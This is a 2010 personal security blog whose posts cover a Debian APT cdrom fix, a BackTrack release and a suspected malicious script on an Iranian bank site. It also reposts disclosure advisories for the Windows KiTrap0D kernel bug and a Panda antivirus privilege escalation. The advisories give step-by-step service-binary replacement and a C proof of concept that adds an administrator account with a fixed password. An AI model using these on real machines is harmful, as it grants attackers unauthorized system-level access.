Wednesday, February 3, 2010

Debian APT issue, how to resolve it ...

Today when I had some work on my Debian Box, I've been encountered to an almost unknown issue .
There's an issue in APT package manager which is typically origins from /etc/fstab configuration file, it's almost sikt for such a big project like debian !
well, whenever you want to use your source lists, whether cdrom or http sources, there's an issue that would be nasty to you.
the prompt is always show you to add /cdrom .
well, in this point I've seen the /etc/fstab configuration file which has the following content:

# /etc/fstab: static file system information.
#
#
proc /proc proc defaults 0 0
/dev/mapper/dhcppc0-root / ext3 errors=remount-ro 0 1
/dev/sda1 /boot ext2 defaults 0 2
/dev/mapper/dhcppc0-home /home ext3 defaults 0 2
/dev/mapper/dhcppc0-tmp /tmp ext3 defaults 0 2
/dev/mapper/dhcppc0-usr /usr ext3 defaults 0 2
/dev/mapper/dhcppc0-var /var ext3 defaults 0 2
/dev/mapper/dhcppc0-swap_1 none swap sw 0 0
/dev/scd0 /media/cdrom0 udf,iso9660 user,noauto 0 0
/dev/fd0 /media/floppy0 auto rw,user,noauto 0 0


from this point of view I realized that the cdrom mount point would be at /dev/scd0, then I issued the umount /dev/scd0 ... with no success .
after that time I issued the mount command :


well, with this command I found the mounting point in the last, for the most effective part I've been used these commands :

umount /dev/hdb
mount /dev/hdb /media/cdrom

with these two commands APT will realize that the mount point is the /cdrom/ and do not prompt you at the time , this is because debian will mount the cdrom at /media/[LABLE OF THE CD] .
I don't know how this problem is solved permanently but I think it should be an update for debian.

goodluck

- Genius

Friday, January 22, 2010

2 important privilege vulnerabilities !

While surfing through new vulnerabilities I saw two important privilege escalation vulnerabilities, fist in the windows (even 7) user mode to ring0 escalation vulnerability, while other security advisory is about Panda security privilege escalation vulnerability .
well, I'll refer them to the security reason.

Microsoft Windows 7 and prior user mode to ring 0 escalation

"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
-------------------------------------------------------------------------

CVE-2010-0232

In order to support BIOS service routines in legacy 16bit applications,
the
Windows NT Kernel supports the concept of BIOS calls in the Virtual-8086
mode
monitor code. These are implemented in two stages, the kernel transitions
to
the second stage when the #GP trap handler (nt!KiTrap0D) detects that the
faulting cs:eip matches specific magic values.

Transitioning to the second stage involves restoring execution context and
call stack (which had been previously saved) from the faulting trap frame
once
authenticity has been verified.

This verification relies on the following incorrect assumptions:

- Setting up a VDM context requires SeTcbPrivilege.
- ring3 code cannot install arbitrary code segment selectors.
- ring3 code cannot forge a trap frame.

This is believed to affect every release of the Windows NT kernel, from
Windows NT 3.1 (1993) up to and including Windows 7 (2009).

Working out the details of the attack is left as an exercise for the
reader.

Just kidding, that was an homage to Derek Soeder :-)

- Assumption 0: Setting up a VDM context requires SeTcbPrivilege.

Creating a VDM context requires EPROCESS->Flags.VdmAllowed to be set in
order
to access the authenticated system service, NtVdmControl(). VdmAllowed can
only be set using NtSetInformationProcess(), which verifies the caller has
SeTcbPrivilege. If this is true, the caller is very privileged and can
certainly be trusted.

This restriction can be subverted by requesting the NTVDM subsystem, and
then
using CreateRemoteThread() to execute in the context of the subsystem
process,
which will already have this flag set.

- Assumption 1: ring3 code cannot install arbitrary code segment
selectors.

Cpl is usually equal to the two least significant bits of cs and ss, and
is
a simple way to calculate the privilege of a task. However, there is an
exception, Virtual-8086 mode.

Real mode uses a segmented addressing scheme in order to allow 16-bit
addresses to access the 20-bit address space. This is achieved by forming
physical addresses from a calculation like (cs << 4) + (eip &
0xffff). The
same calculation is used to map the segmented real address space onto the
protected linear address space in Virtual-8086 mode. Therefore, I must be
permitted to set cs to any value, and checks for disallowed or privileged
selectors can be bypassed (PsSetLdtEnties will reject any selector where
any
of the three lower bits are unset, as is the case with the required cs
pair).

- Assumption 2: ring3 code cannot forge a trap frame.

Returning to usermode with iret is a complicated operation, the pseudocode
for
the iret instruction alone spans several pages of Intel's Software
Developers
Manual. The operation occurs in two stages, a pre-commit stage and a
post-commit stage. Using the VdmContext installed using NtVdmControl(), an
invalid context can be created that causes iret to fail pre-commit, thus
forging a trap frame.

The final requirement involves predicting the address of the second-stage
BIOS
call handler. The address is static in Windows 2003, XP and earlier
operating
systems, however, Microsoft introduced kernel base randomisation in
Windows
Vista. Unfortunately, this potentially useful exploit mitigation is
trivial
to defeat locally as unprivileged users can simply query the loaded module
list
via NtQuerySystemInformation().

--------------------
Affected Software
------------------------

All 32bit x86 versions of Windows NT released since 27-Jul-1993 are
believed to
be affected, including but not limited to the following actively supported
versions:

- Windows 2000
- Windows XP
- Windows Server 2003
- Windows Vista
- Windows Server 2008
- Windows 7

--------------------
Consequences
-----------------------

Upon successful exploitation, the kernel stack is switched to an attacker
specified address.

An attacker would trigger the vulnerability by setting up a specially
formed VDM_TIB in their TEB, using a code sequence like this:

/* ... */
// Magic CS required for exploitation
Tib.VdmContext.SegCs = 0x0B;
// Pointer to fake kernel stack
Tib.VdmContext.Esi = &KernelStack;
// Magic IP required for exploitation
Tib.VdmContext.Eip = Ki386BiosCallReturnAddress;

NtCurrentTeb()->Reserved4[0] = &Tib;
/* ... */

Followed by

/* ... */
NtVdmControl(VdmStartExecution, NULL);
/* ... */

Which will reach the following code sequence via the #GP trap handler,
nt!KiTrap0D. Please note how the stack pointer is restored from the saved
(untrusted) trap frame at 43C3E6, undoubtedly resulting in the condition
described above.

/* ... */
.text:0043C3CE Ki386BiosCallReturnAddress proc near
.text:0043C3CE mov eax, large fs:KPCR.SelfPcr
.text:0043C3D4 mov edi, [ebp+KTRAP_FRAME.Esi]
.text:0043C3D7 mov edi, [edi]
.text:0043C3D9 mov esi, [eax+KPCR.NtTib.StackBase]
.text:0043C3DC mov ecx, 84h
.text:0043C3E1 mov [eax+KPCR.NtTib.StackBase], edi
.text:0043C3E4 rep movsd
.text:0043C3E6 mov esp, [ebp+KTRAP_FRAME.Esi]
.text:0043C3E9 add esp, 4
.text:0043C3EC mov ecx, [eax+KPCR.PrcbData.CurrentThread]
.text:0043C3F2 mov [ecx+KTHREAD.InitialStack], edi
.text:0043C3F5 mov eax, [eax+KPCR.TSS]
.text:0043C3F8 sub edi, 220h
.text:0043C3FE mov [eax+KTSS.Esp0], edi
.text:0043C401 pop edx
.text:0043C402 mov [ecx+KTHREAD.Teb], edx
.text:0043C405 pop edx
.text:0043C406 mov large fs:KPCR.NtTib.Self, edx
.text:0043C40D mov ebx, large fs:KPCR.GDT
.text:0043C414 mov [ebx+3Ah], dx
.text:0043C418 shr edx, 10h
.text:0043C41B mov byte ptr [ebx+3Ch], dl
.text:0043C41E mov [ebx+3Fh], dh
.text:0043C421 sti
.text:0043C422 pop edi
.text:0043C423 pop esi
.text:0043C424 pop ebx
.text:0043C425 pop ebp
.text:0043C426 retn 4
/* ... */

Possibly naive example code for triggering this condition is availble from
the
link below.

http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip

The code has been tested on Windows XP, Windows Server 2003/2008, Windows
Vista
and Windows 7. Support for other affected operating systems is left as an
exercise for the interested reader.

-------------------
Mitigation
-----------------------

If you believe you may be affected, you should consider applying the
workaround
described below.

Temporarily disabling the MSDOS and WOWEXEC subsystems will prevent the
attack
from functioning, as without a process with VdmAllowed, it is not possible
to
access NtVdmControl() (without SeTcbPrivilege, of course).

The policy template "Windows ComponentsApplication
CompatibilityPrevent
access to 16-bit applications" may be used within the group policy
editor to
prevent unprivileged users from executing 16-bit applications. I'm
informed
this is an officially supported machine configuration.

Administrators unfamiliar with group policy may find the videos below
instructive. Further information is available from the Windows Server
Group Policy Home

http://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.

To watch a demonstration of this policy being applied to a Windows Server
2003
domain controller, see the link below.

http://www.youtube.com/watch?v=XRVI4iQ2Nug

To watch a demonstration of this policy being applied to a Windows Server
2008
domain controller, see the link below.

http://www.youtube.com/watch?v=u8pfXW7crEQ

To watch a demonstration of this policy being applied to a shared but
unjoined Windows XP Professional machine, see the link below.

http://www.youtube.com/watch?v=u7Y6d-BVwxk

On Windows NT4, the following knowledgebase article explains how to disable
the
NTVDM and WOWEXEC subsystems.

http://support.microsoft.com/kb/220159

Applying these configuration changes will temporarily prevent users from
accessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few
users
require this functionality.

If you do not require this feature and depend on NT security, consider
permanently disabling it in order to reduce kernel attack surface.

-------------------
Solution
-----------------------

Microsoft was informed about this vulnerability on 12-Jun-2009, and they
confirmed receipt of my report on 22-Jun-2009.

Regrettably, no official patch is currently available. As an effective and
easy
to deploy workaround is available, I have concluded that it is in the best
interest of users to go ahead with the publication of this document without
an
official patch. It should be noted that very few users rely on NT security,
the
primary audience of this advisory is expected to be domain administrators
and
security professionals.

-------------------
Credit
-----------------------

This bug was discovered by Tavis Ormandy.

-------------------
Greetz
-----------------------

Greetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP,
LiquidK,
ScaryBeasts, spender and all my other elite colleagues.

Check out some photography while at ring0 @ http://flickr.com/meder.

-------------------
References
-----------------------

Derek Soeder has previously reported some legendary NT bugs, including
multiple
vdm bugs that, while unrelated to this issue, make fascinating reading.

- http://seclists.org/fulldisclosure/2004/Oct/404, Windows VDM #UD
LocalPrivilege Escalation
- http://seclists.org/fulldisclosure/2004/Apr/477, Windows VDM TIB Local
Privilege Escalation
- http://seclists.org/fulldisclosure/2007/Apr/357, Zero Page Race Condition
Privilege Escalation
"

Panda Security local privilege escalation vulnerability

"security Advisory NSOADV-2010-001 (Version 2)
______________________________________________
______________________________________________


Title: Panda Security Local Privilege Escalation
Severity: Medium
Advisory ID: NSOADV-2010-001
Found Date: 02.2008
Date Reported: 30.11.2009
Release Date: 09.01.2010
Update Date: 20.01.2010
Author: Nikolas Sotiriu (lofi)
Website: http://sotiriu.de
Mail: nso-research at sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2010-001.txt
Vendor: Panda Security (http://www.pandasecurity.com/)
Affected Products: (Self tested)
-Panda Security for Business 4.04.10
-Panda Security for Business with Exchange
4.04.10
-Panda Security for Enterprise 4.04.10
-Panda Internet Security 2010 (15.01.00)
-Panda Global Protection 2010 (3.01.00)
-Panda Antivirus Pro 2010 (9.01.00)
-Panda Antivirus for Netbooks (9.01.00)

(Provided by Panda)
-Panda Global Protection 2009
-Panda Internet Security 2009
-Panda Antivirus Pro 2009
-Panda Internet Security 2008
-Panda Antivirus + Firewall 2008
-Panda Platinum 2007 Internet Security
-Panda Platinum 2006 Internet Security

Affected Component: Corporate Products:
-Panda Security for Desktops 4.05.10
-Panda Security for File Servers 8.04.10

Remote Exploitable: No
Local Exploitable: Yes
Patch Status: Vendor released a patch (See Solution)
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy



Background:
===========

Panda Security for is the security solution for companies
that
need to protect their networks, mainly workstations and file servers.
Panda Security for Business is centrally managed thanks to the
AdminSecure Console, which allows monitoring the entire network,
protecting your critical assets against all types of threats and
optimizing productivity.

(Product description from Panda Website)

This vulnerability is similar to the following vulnerabilities in Panda
products, which where discovered earlier:

Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891
Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186
Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615
Nov 02 2009 Maxim: http://www.securityfocus.com/bid/36897

The earlier reported vulnerabilities only affected the Home user
products. But the business products had the same bug.

More interesting is, that Panda failed since 2006 each year by
releasing the new version with the same old bug.



Description:
============

1. 32Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------

During installation of Panda Security for Desktops/File Servers the
permissions for installation folder

%ProgramFiles%Panda SoftwareAVTC

by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.

The 32bit Version of Panda Security for Desktops/File Servers
installs the TruePrevent package by default, which protects the files
in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
%ProgramFiles%PANDA SOFTWAREAVTCPSKMsSvc.exe (Desktop only)
%ProgramFiles%PANDA SOFTWAREAVTCPavSrv51.exe
%ProgramFiles%PANDA SOFTWAREAVTCPavFnSvr.exe
%ProgramFiles%PANDA SOFTWAREAVTCPSHost.exe
%ProgramFiles%PANDA SOFTWAREAVTCPsImSvc.exe
%ProgramFiles%PANDA SOFTWAREAVTCPsCtrlS.exe
%ProgramFiles%PANDA SOFTWAREAVTCTPSrv.exe


2. 64Bit Version of Panda Security for Desktops/File Servers
+-----------------------------------------------------------

During installation of Panda Security for Desktops/File Servers the
permissions for installation folder

%ProgramFiles%Panda SoftwareAVTC

by default are set to Everyone:Full Control. Few services
(e.g. PavSrvx86.EXE) are started from this folder. Services are started
under LocalSystem account.

In the 64bit Version of Panda Security for Desktops/File Servers is no
TruePrevent package available, which protects the files in the
installation directory from manipulation.

There is no protection of service files. It's possible for unprivileged
user to replace service executable with the file of his choice to get
full access with LocalSystem privileges.

This can be exploited by:

a. Rename PavSrvX86.exe to PavSrvX86.old in Panda folder
b. Copy any application to PavSrvX86.exe
c. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
C:Program Files (x86)PANDA SOFTWAREAVNTPavSrvX86.exe
C:Program Files (x86)PANDA SOFTWAREAVNTPsImSvc.exe
C:Program Files (x86)PANDA SOFTWAREAVNTPskSvc.exe
C:Program Files (x86)PANDA SOFTWAREAVNTPsCtrlS.exe


3. Panda Internet Security/Global Protection/Antivirus Pro 20XX
+-----------------------------------------------------------------------

During installation of the Panda Security 20XX Products the
permissions for installation folder

%ProgramFiles%panda securitypanda

by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.

This products installs the TruePrevent package by default, which
protects the files in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

Executable started as services:
+------------------------------
%ProgramFiles%panda securitypanda firewallPSHOST.EXE
%ProgramFiles%Panda SecurityPanda PavFnSvr.exe
%ProgramFiles%Panda SecurityPanda PsImSvc.exe
%ProgramFiles%Panda SecurityPanda pavsrv51.exe
%ProgramFiles%Panda SecurityPanda PskSvc.exe
%ProgramFiles%Panda SecurityPanda PsCtrls.exe
%ProgramFiles%Panda SecurityPanda TPSrv.exe


4. Panda Antivirus for Netbooks
+------------------------------

During installation of the Panda Antivirus for Netbooks the
permissions for installation folder

%ProgramFiles%panda securityPanda Antivirus for Netbooks

by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account.

This product installs the TruePrevent package by default, which protects
the files in the installation directory from manipulation.

If the TruePrevent Service (Panda TPSrv) is not running the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which the TPSrv is not started and
all services files can be manipulated.

This can be exploited by:

a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
process
b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot

Upon reboot trojaned application will be executed with LocalSystem
account.

This product was not patched like the other 2010 products, so the
the following vulnerability already exists:

http://www.securityfocus.com/bid/36897

TruePrevent bypass: It can be bypassed using "Open" dialog in
"Quarantine" -> Add file" functionality.

Executable started as services:
+------------------------------
%ProgramFiles%Panda SecurityPanda Antivirus for NetbooksPavFnSvr.exe
%ProgramFiles%Panda SecurityPanda Antivirus for NetbooksPsImSvc.exe
%ProgramFiles%Panda SecurityPanda Antivirus for Netbookspavsrv51.exe
%ProgramFiles%Panda SecurityPanda Antivirus for NetbooksPskSvc.exe
%ProgramFiles%Panda SecurityPanda Antivirus for NetbooksPsCtrls.exe
%ProgramFiles%Panda SecurityPanda Antivirus for NetbooksTPSrv.exe



Proof of Concept :
==================

#include
#include

INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user "owner" with password
"PandaOWner123"...n" );

wsprintf( szCmdLine, "%s\system32\net.exe user owner PandaOWner123
/add", szWinDir );

system( szCmdLine );

printf( "Adding user "owner" to the local Administrators
group...n" );

wsprintf( szCmdLine, "%s\system32\net.exe localgroup Administrators
owner /add", szWinDir );

system( szCmdLine );

return 0;
}



Solution:
=========

Home User Products:
+------------------

Panda Advisory
http://www.pandasecurity.com/homeusers/support/card?id=80173&idIdioma=2


Panda Global Protection 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PGP10/hfgp30906s22_r4.exe

Panda Internet Security 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PIS10/hfp150906s25_r1.exe

Panda Antivirus Pro 2010 Hotfix
http://www.pandasecurity.com/resources/sop/PAVPro10/hft90906s21_r1.exe


Business Products:
+-----------------

Panda Advisory
http://www.pandasecurity.com/enterprise/support/card?id=40061&idIdioma=
2

32Bit Version of Panda Security for Desktops/File Servers Hotfix
http://www.pandasecurity.com/resources/sop/AS0404/CSS_x86_SecurityFix.exe

64Bit Version of Panda Security for Desktops/File Servers Hotfix
http://www.pandasecurity.com/resources/sop/AS0404/CSS_x64_SecurityFix.exe
"

Sunday, January 17, 2010

Unwelcome Attack from Maskan-Bank

Unfortunately, the (in)secure iranian government and criticial websites are still highly vulnerablle to malware attacks .
I'm not still sure about this one, 'cuze of the time I've been spended.
it's a link to the maskan-bank, you can click here to see what I mean .
you would like to do such a thing like calculation of something related to your payment.
well, it's really this one and when you go to the above link in fact you're talking to this link .
well, you maybe heared about the some dangerous attacks from various places which is known to the people which is affected before this report .
some website / pages and other web based places is vulnerable to known web application attacks such as Xss (Cross site scripting) and SQL Injection (the most known vulnerability) .
iFrame pages, is a well-known javaScript pages which can load a whole page in a little piece of page .
as you may expect, yes, it's exactly what I want to say, another malicious pages can be loaded into your vulnerable website pages, consider your website PHP pages maybe vulnerable to SQL Injection attacks, if there's an automated tool which scans for malicious pages and affect them then it's possible to infect other web pages .
so, Is there any kind of web based worms which can do such a thing?
the answer is yes, nowadays this attack is common and can affect any page even secure web pages !
well, when you go to the link and want do some calculations, then you will be redirected to a page which is malicious .
there's various kinds of malwares which can affect the Client browser, exploits / viruses are just a few of them and it seems this one is a web based virus .
well finally all the attacks are from this jScript page.



further analysis will be post here as soon as possible about this attack .

any feedback !?

__Genius__

Friday, January 15, 2010

Back-Track 4.0 final release

Now it's time to announce the final release of backTrack 4.0 linux, a distro for penetration testers and hackers .
The primary change of this release is the base of the os, olden releases of this distro was based on slax and now it's a debian based .
for more information and download you can follow this link .